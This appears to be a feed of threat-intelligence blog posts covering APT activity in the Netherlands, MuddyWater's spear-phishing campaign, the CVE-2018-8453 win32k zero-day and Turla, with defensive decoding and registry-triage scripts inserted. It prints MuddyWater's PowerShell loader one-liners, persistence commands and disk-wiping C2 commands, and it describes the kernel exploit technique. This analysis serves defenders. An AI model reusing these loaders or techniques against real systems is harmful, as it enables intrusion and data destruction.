    BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.

    Sofacy

    Sofacy, also known as Pawn Storm, Fancy Bear and many other names, is an active APT group that we have followed since 2011. It is known for using spear phishing emails to infect targets and for the active deployment of 0-days. In 2015, Trend Micro researchers reported that the group had targeted the MH17 investigation team. Last year, the Volkskrant published an article alleging it tried to infect several Dutch Ministries. Then there is the October 4, 2018 news of four alleged Sofacy members having been caught in April 2018 trying to hack the OPCW. Even though we cannot confirm these last two incidents, since we are not involved, we have observed several targets in the Netherlands infected with Sofacy. Interestingly, we observe fewer deployments of Xagent (one of Sofacy’s modules) after April 2018. Although one new Xagent deployment was noted in August 2018, it seems that the group pushed fewer, and then only new, deployments from April through June 2018.

    Hades

    Hades is the name given to the group held responsible for the Olympic Destroyer malware that was found targeting the 2018 Winter Olympic Games in South Korea. Our initial thought was that the malware was related to the Lazarus group, because several of our YARA rules had 100% matches with the malware. However, after careful research we found many false flags that pointed to different APT groups. A few months later, in May 2018 (not long after the OPCW incident took place), we found that Hades had returned and was now targeting financial institutions and chemical threat prevention laboratories. Given this shift of interest, it is no surprise that entities in the Netherlands were targeted as well.

    Buhtrap

    Buhtrap is one of the groups that targets financial institutions with the ultimate goal of stealing money. Its tactics, techniques and procedures (TTPs) don’t differ extensively from those of traditional APT groups. Buhtrap is one of those (Carbanak and Tyupkin are others) that started by infecting financial institutions in Russia and Ukraine, but after a while shifted its focus to other parts of the world. We found Buhtrap activity in the Netherlands in 2017.

    The Lamberts

    In March 2017, WikiLeaks published online a series of documents that they call “Vault 7”. Some of these documents feature malware that resembles that used by the Lamberts, a toolkit that has been used for several years, with most of its activity occurring in 2013 and 2014. One of The Lamberts’ variants we have been investigating is the “Green Lamberts”. We were surprised to see quite a few infections in the Netherlands, when the majority of attacks target Iran. We do not have any insight into the profile of the victims located in the Netherlands. Nevertheless, the fact that Lamberts is active in the Netherlands shows a possible shift in focus, and reminds us that for APT groups, borders do not exist.

    Turla

    Turla, also known as Uroboros, is a very active APT group, believed to be connected to many high-profile incidents such as the US Central Command attack in 2008 and the breach of RUAG (a Swiss military contractor). Other Turla targets include ministries and governmental organizations. Given all this, the Netherlands is a logical target for the Turla group. In fact, we would have been surprised not to have found any Turla infections in the Netherlands.

    Gatak

    Gatak, which also goes by the names of Stegoloader and GOLD, is a group that engages in data theft using watering hole attacks. It has been active since at least 2015, and its main interest is in intellectual property. Even though the use of watering hole attacks means the group does not have full control over who it infects, it has been able to hit a couple of high profile targets. In this case, our sinkhole database enabled us to determine that one of those was a high profile target in the Netherlands.

    Putter Panda

    In 2015, the Dutch chip maker ASML was allegedly breached by Putter Panda. ASML acknowledged the breach and stated that one file was stolen. No further details are publicly available, although there was an episode of the TV program “KRO Reporter”, partially dedicated to the breach. ASML is one of relatively few high-tech companies in the Netherlands. The fact that it has been breached is a clear sign that foreign threat actors are aware of and interested in industrial espionage in the Netherlands.

    Animal Farm

    Animal Farm is a group that has been active since at least 2009. A relatively advanced threat actor, it has been targeting a variety of organizations over the past years. Victims include governmental organizations, military contractors, activists and journalists. Even though the group is mainly focused on French speaking countries, we still found a few infections in the Netherlands.

    Conclusion

    Although our visibility of threat actor activity in the Netherlands is incomplete, the results are nevertheless surprising. Some groups we did not expect to see appear to be active in the country (such as the Lamberts). However, upon further thought, and especially when looking at potential targets located in the Netherlands and comparing this with the interests of some of the APT groups, their activity in the Netherlands makes sense.

    The presence of both expected and unexpected threat actors is a good argument for organizations staying informed of the latest developments in cyberspace, particularly through threat intelligence reports. Because if you know what APT groups are up to, which organisations they target and what TTPs they use, you can implement the protection you need to stay one step ahead of them.

    Such precautions are important, because one of the most stunning findings from the review of sinkhole databases was the number of organizations infected using “ordinary cybercrime malware”. We saw infections among airlines, airports and other major companies (although it should be noted that this happens in other countries as well, not just in the Netherlands). It demonstrates again that it is not so difficult for (APT) groups to breach valuable targets and that basic cyber hygiene is important for everybody.

    As a final note, one should always be careful about deriving hard conclusions from APT findings, particularly in terms of attribution. For example, even though we saw Olympic Destroyer malware being used to target chemical threat prevention laboratories shortly after the OPCW incident, this is not conclusive evidence that the groups behind these attacks are the same, or even related. However, using this fact to monitor your network for the presence of Olympic Destroyer malware if you think you might be a potential Sofacy target – and vice versa – seems like a good approach.

    For more information on our private threat intelligence reporting service, please contact intelreports@kaspersky.com

    MuddyWater expands operations

    Malware Alerts - Wed, 10/10/2018 - 06:00

    Summary

    MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were also detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

    The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

    Decoy images by country

    Jordan

    • The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc)
    • DAMAMAX.doc

    Turkey

    • Turkey’s General Directorate of Security
    • Turkey’s Directorate General of Coastal Safety
    • Turkey’s General Directorate of Security (Onemli Rapor.doc)
    • Turkey’s Ministry of the Interior (Early election.doc)

    Saudi Arabia

    • Document signed by the Major General Pilot, commander of the Saudi Royal Air Force
    • KSA King Saud University (KSU), two documents

    Azerbaijan

    • İnkişaf üçün görüş.doc (meeting for development)

    Iraq

    • Iraqi Ministry of Foreign Affairs
    • Government of Iraq, the Treasury of the Council of Ministers

    Pakistan

    • ECP.doc
    • National Assembly of Pakistan.doc
    • P.Police.doc

    Afghanistan

    • President.doc, E-government of Afghanistan

    Technical details

    Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

    The initial infection vector

    The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

    Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

    The macro payload analysis, dropped files and registry keys

    The macro payload, which is Base64 encoded, does the following:

    1. Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.

    \EventManager.dll
    \EventManager.logs
    \WindowsDefenderService.ini

    2. Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

    Name: WindowsDefenderUpdater
    Type: REG_EXPAND_SZ
    Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

    The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.
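    The Run value and the rundll32/advpack.dll chain described above are a compact hunting pattern. The following Python is an added example, not code from the report, that triages `reg query` output for it; the registry excerpt is constructed, with value names and paths modelled on those the report lists.

```python
"""Triage HKCU Run values for the persistence chain described above.

Added example, not code from the report; the `reg query` output below is
constructed, with value names and paths modelled on those the report lists.
"""
import re

# Constructed excerpt of `reg query HKCU\...\Run` output (not real telemetry).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    WindowsDefenderUpdater    REG_EXPAND_SZ    c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,
    WindowsNT    REG_SZ    wscript.exe C:\ProgramData\WindowsNT\WindowsNT.vbs
    Spotify    REG_SZ    C:\Users\alice\AppData\Roaming\Spotify\Spotify.exe --autostart
"""

# One value line of `reg query`: <indent><name> <REG_type> <data>
RUN_VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")
# Case 1 chain: rundll32 advpack.dll,LaunchINFSection <inf path>[,section,flags,]
LAUNCHINF_RE = re.compile(
    r"rundll32(?:\.exe)?\s+advpack\.dll\s*,\s*LaunchINFSection\s+(?P<inf>[^,]+)", re.I)
# Case 2 chain: a script host started on a file under ProgramData
SCRIPT_HOST_RE = re.compile(r"\b(mshta|wscript|cscript)(?:\.exe)?\b.*\\ProgramData\\", re.I)


def parse_run_values(reg_query_output):
    """Return (name, type, data) for each value line of `reg query` output."""
    values = []
    for line in reg_query_output.splitlines():
        m = RUN_VALUE_RE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"].strip()))
    return values


def triage_run_value(data):
    """Return the reasons a Run value matches the report's persistence pattern."""
    reasons = []
    m = LAUNCHINF_RE.search(data)
    if m:
        # LaunchINFSection is also used by legitimate installers, so the
        # ProgramData / non-.inf check below is what raises confidence.
        reasons.append("rundll32 advpack.dll,LaunchINFSection launches an INF at logon")
        inf = m["inf"].strip()
        if "\\programdata\\" in inf.lower() and not inf.lower().endswith(".inf"):
            reasons.append("INF argument lives in ProgramData with a non-.inf extension: " + inf)
    if SCRIPT_HOST_RE.search(data):
        reasons.append("script host (mshta/wscript/cscript) fed a file from ProgramData")
    return reasons


def triage_run_key(reg_query_output):
    """Map each suspicious value name to its list of reasons."""
    findings = {}
    for name, _type, data in parse_run_values(reg_query_output):
        reasons = triage_run_value(data)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage_run_key(SAMPLE_REG_QUERY).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```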

    Case 1: INF, SCT and text files dropped by the macro
    1. The INF is launched via the advpack.dll “LaunchINFSection” function.
    2. The INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
    3. Via WMI (winmgmt), the JavaScript or VBScript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.

    powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

    PowerShell one-liner

    Encoded text file

    Execution flow:

    Case 2: VBS and text files dropped by the macro

    The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

    powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

    PowerShell one-liner

    Encoded text file

    Execution flow:
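    Both one-liners only unwrap the text file dropped in ProgramData, so an analyst can recover the next stage offline. The following Python is an added example, not code from the report or the malware, that re-implements both decoders: the base-52 arithmetic of Case 1 and the Base64/UTF-16LE unwrapping of Case 2; the encoder and sample strings are constructed here solely to produce test input.

```python
"""Decode the text files consumed by the two MuddyWater PowerShell one-liners.

Added example for analysts, not code from the report or the malware.
"""
import base64


def decode_base52_text(encoded: str) -> str:
    """Case 1: re-implements the decoding loop of the first one-liner.

    Each character contributes a base-52 digit (ord(ch) - 40). After every
    third character the accumulated value is split into bytes, least
    significant first, skipping zero bytes; the collected bytes are finally
    reversed to yield the next-stage script.
    """
    out = []
    v = 0
    for i, ch in enumerate(encoded):
        v = v * 52 + (ord(ch) - 40)
        if (i + 1) % 3 == 0:
            while v != 0:
                vv = v % 256
                if vv > 0:
                    out.append(chr(vv))
                # PowerShell's [Int32]($v/256) rounds to nearest; for ASCII
                # payloads (low byte < 128) that equals floor division.
                v //= 256
    out.reverse()
    return "".join(out)


def decode_base64_unicode(encoded: str) -> str:
    """Case 2: Base64 wrapping UTF-16LE text, as consumed by the second one-liner."""
    return base64.b64decode(encoded).decode("utf-16-le")


def encode_base52_text(clear: str) -> str:
    """Inverse of decode_base52_text; constructed only to build test vectors."""
    rev = clear[::-1]
    chunks = []
    for i in range(0, len(rev), 2):
        pair = rev[i:i + 2]
        v = ord(pair[0]) + (ord(pair[1]) * 256 if len(pair) == 2 else 0)
        digits = ((v // 52 ** 2) % 52, (v // 52) % 52, v % 52)
        chunks.append("".join(chr(d + 40) for d in digits))
    return "".join(chunks)


# Constructed samples (not captured payloads); a harmless command stands in
# for the real next stage.
CLEAR_SAMPLE = "Write-Host 'next stage would run here'"
BASE52_SAMPLE = encode_base52_text(CLEAR_SAMPLE)
BASE64_SAMPLE = "aQBlAHgA"  # UTF-16LE "iex", Base64-encoded


if __name__ == "__main__":
    print("case 1:", decode_base52_text(BASE52_SAMPLE))
    print("case 2:", decode_base64_unicode(BASE64_SAMPLE))
```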

    The PowerShell code

    When PowerShell is invoked, whether via WMI, wscript.exe or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

    The first thing the PowerShell code does is to disable Office “Macro Warnings” and “Protected View”. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

    Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.

    “win32_remote”, “win64_remote64”, “ollydbg”, “ProcessHacker”, “tcpview”, “autoruns”, “autorunsc”, “filemon”, “procmon”, “regmon”, “procexp”, “idaq”, “idaq64”, “ImmunityDebugger”, “Wireshark”, “dumpcap”, “HookExplorer”, “ImportREC”, “PETools”, “LordPE”, “dumpcap”, “SysInspector”, “proc_analyzer”, “sysAnalyzer”, “sniff_hit”, “windbg”, “joeboxcontrol”, “joeboxserver”

    Blacklisted process names in the malware

    In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dll “NtRaiseHardError” function.

    CnC communication

    A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $dragon_middle, then sleeps from one to 30 seconds and loops again.

    Victim system reconnaissance

    The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.

    The public IP, OS version, internal IP, machine name, domain name and user name are then encrypted and POSTed to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID, $sysid. This ID is sent to the CnC with each request for commands to execute.

    Supported commands

    “upload”, “screenshot”, “Excel”, “Outlook”, “risk”, “reboot”, “shutdown”, “clean”. These commands vary from one version to another.

    1. The “screenshot” command takes a screenshot that is saved as a .PNG file in “ProgramData”.
    2. The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
    3. The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
    4. The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
    5. The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData”.
    6. The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
    7. The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.

    In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper”, “Panda”, or “ESET”.

    Victimology

    Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

    Attacker deception and attribution

    The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

    • C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

    Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

    In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.

    无法连接到网址,请等待龙…
    无法访问本地计算机寄存器
    任务计划程序访问被拒绝

    Chinese text found in PowerShell code in multiple samples

    Unable to connect to the URL, please wait for the dragon…
    Unable to access local computer register
    Task Scheduler access denied

    Translation of Chinese text

    We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.

    http://www.cankayasrc[.]com/style/js/main.php
    http://ektamservis[.]com/includes/main.php
    http://gtme[.]ae/font-awesome/css/main.php

    Recommendations for organizations

    Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

    The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

    1. Use PowerShell Constrained Language Mode, since the malware’s PowerShell code relies on IEX, Add-Type and New-Object.
    2. Lock the PowerShell execution policy to “AllSigned” via GPO.
    3. Deploy a whitelisting solution to prevent suspicious parent-child process execution hierarchies.

    Conclusion

    The MuddyWater group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

    In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

    • Educate general staff to be able to distinguish malicious behavior like phishing links.
    • Educate information security staff to have full configuration, investigative and hunting abilities.
    • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
    • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
    • Make sure enterprise-grade patch management processes are well established and executed.

    High-profile organizations should maintain elevated levels of cybersecurity; attacks against them are inevitable and are unlikely to ever cease.

    Additional information

    Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

    Indicators of compromise MD5

    File names

    %SystemDrive%\ProgramData\EventManager.dll
    %SystemDrive%\ProgramData\EventManager.logs
    %SystemDrive%\ProgramData\WindowsDefenderService.ini
    %SystemDrive%\ProgramData\Defender.sct
    %SystemDrive%\ProgramData\DefenderService.inf
    %SystemDrive%\ProgramData\WindowsDefender.ini
    %SystemDrive%\ProgramData\ZIPSDK\InstallConfNT.vbs
    %SystemDrive%\ProgramData\ZIPSDK\ProjectConfManagerNT.ini
    %SystemDrive%\ProgramData\WindowsDefenderTask.ini
    %SystemDrive%\ProgramData\WindowsDefenderTask.txt
    %SystemDrive%\ProgramData\WindowsDefenderTask.xml
    %SystemDrive%\ProgramData\DefenderNT\ConfigRegister.vbs
    %SystemDrive%\ProgramData\DefenderNT\SetupConf.ini
    %SystemDrive%\ProgramData\ASDKiMalwareSDK\ProjectConfSDK.vbs
    %SystemDrive%\ProgramData\ASDKiMalwareSDK\SetupConfSDK.ini
    %SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.ini
    %SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.vbs
    %SystemDrive%\ProgramData\OneDrive.dll
    %SystemDrive%\ProgramData\OneDrive.html
    %SystemDrive%\ProgramData\OneDrive.ini
    %SystemDrive%\ProgramData\WindowsNT\WindowsNT.ini
    %SystemDrive%\ProgramData\WindowsNT\WindowsNT.vbs
    %SystemDrive%\ProgramData\SYSTEM32SDK\ConfManagerNT.vbs
    %SystemDrive%\ProgramData\SYSTEM32SDK\ProjectConfManagerNT.ini
    %windir%\System32\Tasks\Microsoft\WindowsDefenderUpdater
    %windir%\System32\Tasks\Microsoft\MicrosoftOneDrive
    %windir%\System32\Tasks\Microsoft\WindowsDifenderUpdate
    %windir%\System32\Tasks\Microsoft\WindowsSystem32SDK
    %windir%\System32\Tasks\Microsoft\WindowsDefenderSDK
    %windir%\System32\Tasks\Microsoft\WindowsMalwareDefenderSDK
    %windir%\System32\Tasks\Microsoft\WindowsMalwareByteSDK

    Domains, URLs and IP addresses

    Zero-day exploit (CVE-2018-8453) used in targeted attacks

    Malware Alerts - Wed, 10/10/2018 - 03:00

    Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

    In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get the privileges necessary for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

    So far, we have detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

    Kaspersky Lab products detected this exploit proactively through the following technologies:

    1. Behavioral detection engine and Automatic Exploit Prevention for endpoints
    2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

    Kaspersky Lab Verdicts for the artifacts in this campaign are:

    • HEUR:Exploit.Win32.Generic
    • HEUR:Trojan.Win32.Generic
    • PDM:Exploit.Win32.Generic

    More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

    Technical details

    CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

    For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

    The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

    Hooked functions in the Kernel Callback Table

    Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

    Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

    When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

    The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

    Vulnerable code inside NtUserSetWindowFNID

    The fnid status of the window is located at offset 0x02a in the tagWND structure:

    kd> dt win32k!tagWND

    +0x02a fnid : Uint2B

    When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

    The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

    Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

    We can check what the new fnid value is by verifying it against the ReactOS source code:

    /* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
    #define FNID_SCROLLBAR 0x029A

    #define FNID_BUTTON 0x02A1

    #define FNID_FREED 0x8000 /* Window being Freed… */

    This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

    To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

    Heap spraying procedures supported in the exploit

    For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

    Heap Feng Shui technique for Windows RS4 17134

    This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

    Freed scrollbar heap allocation

    When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

    Freed allocation is merged with the following pool

    This results in a powerful arbitrary kernel Read/Write primitive built on GDI Bitmap objects that works even on the latest Windows versions.

    Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

    Modified Token-stealing payload process

    So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

    • Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
    • Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
    • Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory

    More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

    Victims

    The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

    Attribution

    During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

    Conclusion

    Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

    So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

    We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

    Appendix I – Indicators of compromise

    Domains:

    weekendstrips[.]net
    shelves-design[.]com

    Shedding Skin – Turla’s Fresh Faces

    Malware Alerts - Thu, 10/04/2018 - 12:00

    Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

    Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

    For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.

    Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

    And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

    Essentially, we are discussing ongoing activity revolving around several malware families:

    • KopiLuwak and IcedCoffee
    • Carbon
    • Mosquito
    • WhiteBear

    Technical Rattle

    Turla’s Shifting to Scripting – KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas

